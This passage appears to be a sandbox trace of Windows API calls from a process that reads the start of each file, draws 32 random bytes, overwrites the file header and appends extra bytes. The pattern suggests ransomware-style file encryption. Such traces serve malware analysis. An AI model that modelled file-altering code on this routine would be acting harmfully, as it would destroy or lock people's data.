out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.111] GetProcessHeap () returned 0x4f10000 [0086.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.112] GetProcessHeap () returned 0x4f10000 [0086.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.113] GetProcessHeap () returned 0x4f10000 [0086.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.113] SetFilePointerEx (in: hFile=0x9e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.114] WriteFile (in: hFile=0x9e8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.114] WriteFile (in: hFile=0x9e8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.114] GetProcessHeap () returned 0x4f10000 [0086.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.114] GetProcessHeap () returned 0x4f10000 [0086.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.114] GetProcessHeap () returned 0x4f10000 [0086.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.114] CloseHandle (hObject=0x9e8) returned 1 [0086.116] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 156 [0086.116] SetFilePointerEx (in: hFile=0x9ec, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.116] ReadFile (in: hFile=0x9ec, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.116] SetFilePointerEx (in: hFile=0x9ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.116] GetProcessHeap () returned 0x4f10000 [0086.116] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.116] GetProcessHeap () returned 0x4f10000 [0086.116] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.116] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.116] GetProcessHeap () returned 0x4f10000 [0086.116] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.116] ReadFile (in: hFile=0x9ec, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.201] SetFilePointerEx (in: hFile=0x9ec, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.201] WriteFile (in: hFile=0x9ec, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.202] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.203] GetProcessHeap () returned 0x4f10000 [0086.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.204] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.204] GetProcessHeap () returned 0x4f10000 [0086.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.205] GetProcessHeap () returned 0x4f10000 [0086.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.206] GetProcessHeap () returned 0x4f10000 [0086.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.206] SetFilePointerEx (in: hFile=0x9ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.206] WriteFile (in: hFile=0x9ec, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.207] WriteFile (in: hFile=0x9ec, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.207] GetProcessHeap () returned 0x4f10000 [0086.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.207] GetProcessHeap () returned 0x4f10000 [0086.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.207] GetProcessHeap () returned 0x4f10000 [0086.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.207] CloseHandle (hObject=0x9ec) returned 1 [0086.209] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 157 [0086.209] SetFilePointerEx (in: hFile=0x9f0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.209] ReadFile (in: hFile=0x9f0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.209] SetFilePointerEx (in: hFile=0x9f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.209] GetProcessHeap () returned 0x4f10000 [0086.209] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.209] GetProcessHeap () returned 0x4f10000 [0086.209] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.209] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.209] GetProcessHeap () returned 0x4f10000 [0086.209] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.209] ReadFile (in: hFile=0x9f0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.261] SetFilePointerEx (in: 